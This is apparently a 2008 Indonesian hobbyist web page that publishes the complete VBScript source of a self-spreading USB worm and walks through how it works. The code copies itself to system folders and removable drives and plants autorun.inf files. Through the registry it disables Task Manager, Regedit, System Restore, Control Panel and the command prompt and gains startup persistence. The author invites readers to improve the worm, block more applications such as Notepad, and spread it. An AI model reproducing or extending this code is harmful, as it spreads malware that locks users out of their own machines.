Loading...

Galuh.vbs


Aha_ha

 

Virus Zone

 

 

Link
www.Ariyanto.multiply.com www.Ariyanto.page.tl www.Friendster.comAriyantoFriends

 

 

 

 

Aha_ha.Vbs

Galuh.3gp.Vbs

 

Nah... kalo yang pingin coba-coba VIrus, lebih baek virus Ni aje.... Virus ni lebih aman dan nyaman, kembangin dan sebarin ya! Tapi....saya yakin jika virus ini jatuh ke tangan orang kreatif plus tak bertanggung jawab, wah wah wah... virus ini bisa sangat berbahaya! Namun itu urusan belakangan, pelajarin aja dulu souskodenya lalu kembangin, caranya kopi kode dari mulai huruf 'O' sampai huruf 'E' lalu paste di notpet (notepad maksudnya), lalu save dengan nama "Apa_aja.vbs". Penjelasannya ada di bawah. (Klik di sini untuk penjelasan)

 

 

------------------------------

 

 SOURCE CODE VIRUS

 

-------------

 

on error resume next

dim urang,abdi,aing,kuring,anak,mf,isi,tf,galuh,nt,check,sd

 

'siapkan isi autorun

isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe Aha_ha.vbs"

set anak = createobject("Scripting.FileSystemObject")

set mf = anak.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2)

do while not text.atendofstream

urang = urang & text.readline

urang = urang & vbcrlf

loop

do

 

'buat file induk

Set aing = anak.getspecialfolder(0)

Set abdi = anak.getspecialfolder(1)

set tf = anak.getfile(abdi & "recycle.vbs")

tf.attributes = 32

set tf = anak.createtextfile(abdi & "recycle.vbs",2,true)

tf.write urang

tf.close

set tf = anak.getfile(abdi & "recycle.vbs")

tf.attributes = 39

 

'sebar ke removable disc ditambahkan dengan Autorun.inf

for each kuring in anak.drives

 

If (kuring.drivetype = 1 or kuring.drivetype = 2) and kuring.path <> "A:" then

 

set tf=anak.getfile(kuring.path &"galuh.sys.vbs")

tf.attributes =32

set tf=anak.createtextfile(kuring.path &"Aha_ha.vbs",2,true)

tf.write urang

tf.close

set tf=anak.getfile(kuring.path &"Aha_ha.vbs")

tf.attributes = 39

 

set tf =anak.getfile(kuring.path &"autorun.inf")

tf.attributes = 32

set tf=anak.createtextfile(kuring.path &"autorun.inf",2,true)

tf.write isi

tf.close

set tf = anak.getfile(kuring.path &"autorun.inf")

tf.attributes=39

end if

next

 

 

'Manipulasi Registry

set galuh = createobject("WScript.Shell")

 

'Ubah IE Title

galuh.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","::Pesan anda tulis di sini!::"

 

'File Hidden tak terlihat

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerAdvancedHidden",1, "REG_DWORD"

 

'Blokir Find, FolderOptions, Run, Regedit, Task Manager, System Restore, perubahan Wallpaper, Hotkey, Control Panel, dan Log Off

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind", "1", "REG_DWORD"

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions", "1", "REG_DWORD"

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun", "1", "REG_DWORD"

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools", "1", "REG_DWORD"

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr", "1", "REG_DWORD"

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu", "1", "REG_DWORD"

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoTrayContextMenu", "1", "REG_DWORD"

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesActiveDesktopNoChangingWallpaper", "0", "REG_DWORD"

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWinKeys", "1", "REG_DWORD"

galuh.RegWrite "HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindows NTSystemRestoreDisableSR", "1", "REG_DWORD"

galuh.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff", "1", "REG_DWORD"

galuh.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoControlPanel", "1", "REG_DWORD"

 

'Ubah tulisan pertama pada text box menu RUN

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerRunMRUa", "Pesan Anda di Sini"

galuh.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerRunMRUMRUList", "a"

 

'Buat pesan saat Windows Startup

galuh.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption", "Selamat menikmati"

galuh.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText", "Saya numpang nginep di komputer ini ya! Tenang aja it's Ok, saya gak bakalan ngrusak komputer kamu kok!"

galuh.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunAgeia", abdi & "recycle.vbs"

galuh.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page", "http://www.google.com"

galuh.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exeDebugger","1"

if check <> 1 then

Wscript.sleep 200000

end if

loop while check <> 1

set sd = createobject("Wscript.shell")

sd.run aing & "explorer.exe /e,/select, " & Wscript.ScriptFullname

 

---------------------

 


Penjelasan!

 

Nama virusnya adalah 'galuh.3gp.vbs' a.k.a 'Aha_ha.vbs'. Virus ini tidak berbahaya, namun namanya juga virus pastilah menjengkelkan. Soalnya virus ini sulit sekali untuk dihapus secara manual, tapi tenang aja, banyak antivirus yang sudah berkenalan dengan virus ini. Jadi jangan takut untuk berkreasi dengan virus ini di komputer Sampeyan (baca: Anda).

Pertama-tama, virus ini membuat file autorun.inf pada setiap direktori. Apabila file autorun ini dibuka pake notpet, maka akan muncul:

-----------

[Autorun]

Shellexecute=WScript.exe galuh.3gp.vbs

atau

Shellexecute=WScript.exe Aha_ha.vbs

-----------

Autorun ini fungsinya untuk mengeksekusi virus tanpa harus mengeksekusi langsung file virus tsb. Cukup dengan klik ganda pada drive yang terinfeksi atau menekan enter pada drive tsb. maka virus ini tereksekusi dengan sendirinya. Itu artinya, Anda tidak akan sadar bahwa Anda telah mengaktifkan BOM pada komputer Anda sendiri.

Pembuatan File Autorun.inf ini ada pada kode:

--------------

'siapkan isi autorun

isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe Aha_ha.vbs"

set anak = createobject("Scripting.FileSystemObject")

set mf = anak.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2)

do while not text.atendofstream

urang = urang & text.readline

urang = urang & vbcrlf

loop

do

------------

Metode ini telah popular di dunia Virus. Mungkin karena Virus Maker berfikir bahwa dengan cara ini, virus mereka akan dengan mudah menyebar tanpa disadari oleh empunya komputer.

Teknologi Autorun pada virus yang lain bahkan ada yang lebih maju. Kita tilik aja Autorun milik Virus ".vbs". Jika dibuka filenya maka akan terlihat:

----

[Autorun]

Shellexecute=WScript.exe .vbs

shellopencommand=WScript.exe .vbs

shellexplorecommand=WScript.exe .vbs

action=Open folder to view files

 

----

        - Shellexecute=wscript.exe .vbs berfungsi untuk menentukan aksi saat drive diklik ganda atau enter. Ketika drive ditekan enter atau diklik ganda, maka komputer akan membuka aplikasi 'WScript.exe' (Aplikasi pembuka skrip milik Microsoft) dengan file yang akan dibuka yakni ".vbs".


        - Shellopencommand=.vbs atau Shellexplorecommand=.vbs berfungsi untuk menentukan aksi saat drive diklik kanan kemudian Open atau Explore. Jadi ketika drive diklik kana kemudian Explore/Open, maka yang akan terbuka adalah file ".vbs" alias file Virus.

 

        * Kode di atas mempunyai formula spt. di bawah ini, dan kita bisa manipulasi sesuai dengan yang kita inginkan.

Shell[Kata-kata]command=[aplikasi].exe [spasi] [File_yang_ingin_dibuka.file]

 

contoh:

ShellBuka dong!command=mplayer2.exe Laguku.mp3

 

 



        - Action=Open folder to view files berfungsi untuk menampilkan kotak dialog 'Action' dengan default 'Open folder to view files' pada saat Drive (flashdisk dll) dicolokkan ke dalam komputer, maka akan muncul kotak dialog seperti pd gambar dibawah, jika Aksi ini dipilih, atau dengan kata lain ditekan tombol OK, maka akan dijalankan aksi 'Shellexecute=namavirus' dengan kata lain jika ditekan ok maka sama saja dengan membuka file virus.

 

        * Kode di atas memiliki formula:

Action=[kata-kata]

        Kita bisa ganti kata-kata tersebut dengan kata yang kita inginkan. Contoh:

Action=Pilih saya dong!

 


       

 

 

Nah sekarang tugas Anda untuk mengembangkan file Autorun pada virus ini seperti yang dijelaskan di atas.

 

 

Tahap selanjutnya dari virus ini adalah pembuatan file induk virus. FIle induk virus terletak pada direktori:

 

C:WindowsRecycle.vbs atau di mana Windows terinstal

 

Dengan kombinasi dari manipulasi registri Windows, maka dengan file induk ini virus akan tetap hidup selama komputer itu hidup.

Lalu Virus tsb. menyebarluaskan dirinya sendiri pada setiap drive ditambah dengan file Autorun.inf yang sudah dipersiapkan tadi. Dengan kombinasi tersebut, maka virus ini sudah punya cukup modal untuk menyebar dengan mudah ke seantero jagad.


 Karena virus ini berbentuk VBScript, maka akan dengan mudah untuk diedit oleh orang ataupun dideteksi oleh antivirus, tapi jangan kuatir, virus ini punya trik jitu untuk menangkalnya. Lihat kode di bawah ini!

 

galuh.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exeDebugger","1"

 

Kode di atas berfungsi untuk menuliskan kunci pada registri Windows yang berfungsi untuk memblokir aplikasi yang dirasa membahayakan kelangsungan hidup virus ini. Pada contoh, saya tulis '....cmd.exe...' itu adalah kode untuk memblokir program CommandPromt. Maka dari itu, silakan KEMBANGKAN kode tersebut untuk memblokir aplikasi yang lain yang dirasa membahayakan, seperti 'Notepad'. (Loh Kok notpet berbahaya?). Memang, notpet tidak berbahaya, tapi karena virus ini berekstensi VBS, maka aplikasi untuk membuka dan mengedit atau mengacak-acak virus ini adalah notpet itu. Jadi sangat penting untuk memblokir applikasi notpet agar virus ini tidak diutak atik orang lain.

 

Tips lain. Jika pingin lebih jail, coba blokir semua aplikasi yang paling sering digunakan oleh USEr, dengan demikian, maka virus ini cukup untuk membuat USEr menjadi pusing tujuh keliling karena filenya tidak bisa dibuka dan aplikasinya telah diblokir oleh Anda.

 

Untuk memberi kenang-kenangan, virus ini juga menuliskan pesan pada saat kom. start up. Juga pada menu RUN dan pada judul di InternetExplorer. Lumayan kan buat ngenalin diri kita, atau sekadar promosi, mumpung gratiss.........

 

Udah deh, kalo pingin lebi jelas, Kopi dan paste or donlot aja kodenya lalu eksekusi deh di komputer kamu, biar kamu tahu akibat yang ditimbulkan dari virus ini.

 

Yours Truly

 

Ariyanto


HOME

Author information goes here.
riyanto.mail@gmail.com
Copyright Ariyanto © 2008 [Aha_ha Communitee]. All rights reserved.
Revised: 07/25/08.
1

123 Sample Rd, Samplington, SA 12345
(555) 0123